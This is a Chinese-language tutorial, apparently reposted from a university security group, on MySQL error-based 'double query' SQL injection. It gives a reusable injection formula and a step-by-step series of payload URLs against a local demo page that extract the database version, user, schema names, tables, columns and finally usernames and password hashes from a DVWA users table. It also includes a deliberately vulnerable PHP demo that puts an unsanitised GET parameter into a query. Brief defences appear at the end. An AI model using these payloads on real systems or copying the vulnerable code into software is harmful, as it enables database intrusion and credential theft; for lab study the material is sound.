介紹一下雙查詢注入，什么叫雙查詢注入，這個(gè)有點(diǎn)難以解釋，通俗的來(lái)說就是嵌套子查詢。我們理解一下子查詢，查詢的關(guān)鍵字是select，這個(gè)大家都知道。子查詢可以簡(jiǎn)單的理解在一個(gè)select語(yǔ)句里還有一個(gè)select，里面的這個(gè)select語(yǔ)句就是子查詢。

這種方法適用于注入的時(shí)候沒有返回位，但是有返回位的時(shí)候也適用，不過又返回位的時(shí)候就不建議在、用這個(gè)啦!返回位就是你們union select 1,2,3,4,5,6,7,8 這里是8個(gè)字段

這里顯示2,4,5,6,7,8就是返回位

另外，就是要有返回mysql錯(cuò)誤提示，php返回錯(cuò)誤提示有兩種,看下圖

這是mysql返回的錯(cuò)誤

這是php返回的錯(cuò)誤

雙注入的原理，簡(jiǎn)單一句話原理就是有研究人員發(fā)現(xiàn)，當(dāng)在一個(gè)聚合函數(shù)，比如count函數(shù)后面如果使用分組語(yǔ)句就會(huì)把查詢的一部分以錯(cuò)誤的形式顯示出來(lái)。

floor()和rand()，count()就不在多說啦

但是concat()函數(shù)，就來(lái)說一下，concat是一個(gè)連接函數(shù)，可以連接多個(gè)字符，例如

1concat("abc","123")="abc123"

并且支持ascii碼,例如：

1concat("abc",0x22,"123")=abc"123

(0×22就是雙引號(hào),可以用來(lái)當(dāng)分隔符)

這里在mysql輸入

1select concat((select version()))

在concat里執(zhí)行查詢要用括號(hào)括起來(lái)，同時(shí)要確定只返回 一條數(shù)據(jù)，不然得用limit來(lái)保證只有一條結(jié)果 (limit 0,1 返回第一條)

如果這條語(yǔ)句添加from的話，就會(huì)返回表中的記錄的條數(shù)，就是有多少條記錄就會(huì)返回多少次的版本號(hào)，看圖

這里還沒有顯示完!!

因此

1select concat((select version()),floor(rand()*2)) from mysql.user;

(這里我用的是mysql中的mysql數(shù)據(jù)庫(kù)，user表有四條記錄 )

(小編注：rand()函數(shù)是生成0-1之間的小數(shù)隨機(jī)值，rand()*2是生成0-2之間的小數(shù)隨機(jī)數(shù)，floor(rand()*2)就相當(dāng)于生成0/1兩個(gè)隨機(jī)值)

Attention，這里顯示的值是版本號(hào)加上rand()生成的，正確版本好是去掉后面的0或1

現(xiàn)在我們加上group by ，因?yàn)槿绻覀儚膄rom 某張表的話，可能里面就會(huì)有很多條記錄，然后就可能生成隨機(jī)值(據(jù)說是這樣的，如果不是，還望告知)

這里用information_schema.tables來(lái)弄，因?yàn)樗挠涗泬蚨?，如前一條語(yǔ)句，你就可以知道啦

group by 一下多清爽啦

看語(yǔ)句中

1select concat((select version()),floor(rand()*2))a from information_schema.tables group by a;

這里加粗的a是把 as a 簡(jiǎn)寫成 a 而已，說一下group by ，這個(gè)的作用就是把5.1.69-0ubuntu0.10.04.10 分為一組，5.1.69-0ubuntu0.10.04.11 的分為一組

(小編注:如果各位看官不知道這里是怎么回事，執(zhí)行一下

1select concat((select version()),floor(rand()*2)) from information_schema.tables

就清楚了)

最后就來(lái)到這個(gè)count()函數(shù)了，這個(gè)函數(shù)妙用可以看一下下圖

1select count(*),concat((select version()),floor(rand()*2))a from information_schema.tables group by a

看到了沒有，返回了我們后面concat的內(nèi)容啦

ERROR 1062 (23000): Duplicate entry ’15.1.69-0ubuntu0.10.04.1′ for key ‘group_key’,我們看看phpmyadmin下比較詳細(xì)的報(bào)錯(cuò)：

說了這么多就為了這個(gè)而已!!

好了，給個(gè)小小demo(demo在本文最后)給你們，不過弄不出一個(gè)沒有顯示返回位的，所以就將就一下的

然后雙注入查詢是有固定公式的

1union select 1 from (select+count(*),concat(floor(rand(0)*2),( 注入爆數(shù)據(jù)語(yǔ)句))a from information_schema.tables group by a)b

這里將下面的demo設(shè)置數(shù)據(jù)庫(kù)的一些參數(shù)之后，保存成yi.php，我們的演示就正式開始了

這是正常的情況：

加個(gè)單引號(hào)后

這里說明有注入了，然后用order by 判斷字段咯，這里就截圖了(太麻煩啦)，字段數(shù)是8個(gè)(其實(shí)不判斷也可以的，只要確定有注入就行啦)

1、先讀個(gè)數(shù)據(jù)庫(kù)的版本、用戶、當(dāng)前庫(kù)名

1http://127.0.0.1/yi.php?id=-1 union select 1 from (select count(*), concat(floor(rand()*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b

這里數(shù)據(jù)庫(kù)版本：5.1.28-rc-community

用戶是：root@localhost

數(shù)據(jù)庫(kù)名：test

2、然后讀數(shù)據(jù)庫(kù)有哪些庫(kù)

1http://127.0.0.1/yi.php?id=-1 union select 1 from (select count(*), concat(floor(rand()*2),(select schema_name from information_schema.schemata limit 0,1))a from information_schema.tables group by a)b

這里要注意，因?yàn)閟ql語(yǔ)句會(huì)返回多條記錄，所以要用limit來(lái)限制返回的條數(shù)，limit 0,1是第一條記錄

limit 1,1是第二條記錄

(小編注：通過控制limit來(lái)逐條查看數(shù)據(jù)庫(kù)名稱，請(qǐng)忽略前面的0或是1)

3、然后看看有什么表

因?yàn)槲矣袀€(gè)dvwa的數(shù)據(jù)庫(kù)，所以就用那個(gè)來(lái)做示范啦

1http://127.0.0.1/yi.php?id=-1 union select 1 from (select+count(*),concat(floor(rand(0)*2),(select table_name from information_schema.tables where table_schema=0x64767761 limit 1,1))a from information_schema.tables group by a)b

加粗是dvwa的hex值，這樣得到dvwa的users的表

4、然后看有什么字段

1http://127.0.0.1/yi.php?id=-1 union select 1 from (select count(*) ,concat(floor(rand(0)*2),(select column_name from information_schema.columns where table_name =0x7573657273 limit 0,1 ))a from information_schema.tables group by a)b

然后修改limit的值，得到字段user,password

5、然后讀取字段的值

1http://127.0.0.1/yi.php?id=-1 union Select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user,0x22,password) from dvwa.users limit 0,1))a from information_schema.tables group by a)b

這樣子就得到字段的值啦，然后提醒一下，要是跨庫(kù)讀取數(shù)據(jù)，要寫成數(shù)據(jù)庫(kù)名然后.表名。因?yàn)楫?dāng)前數(shù)據(jù)庫(kù)是test，然后我讀的是dvwa庫(kù)的users的表，所以要寫成dvwa.users

好了基本就是這么多啦。

防范辦法：

一個(gè)是過濾啦(把’,”,union,select load_file,%,and等敏感字符都過濾啦)

另一個(gè)是參數(shù)化查詢，就是一種把查詢語(yǔ)句給固定死了，無(wú)論傳過來(lái)的值是什么，都只當(dāng)做變量來(lái)執(zhí)行查詢語(yǔ)句

demo的源碼：

<?php 
$dbuser = "root"; 
$dbpwd = "";     //這里是mysql的密碼 
$db = "test"; 
$conn = mysql_connect("localhost",$dbuser,$dbpwd) or die("error"); 
mysql_select_db($db,$conn); 
$id = $_GET['id']; 
$query = "select * from test where id =$id"; 
$result = mysql_query($query) or die(mysql_error()); 
print_r(mysql_fetch_array($result)); 
//簡(jiǎn)單的寫一下而已 
?> 

[via@廣外(廣東外語(yǔ)外貿(mào)大學(xué))網(wǎng)絡(luò)安全小組_臺(tái)灣鴿]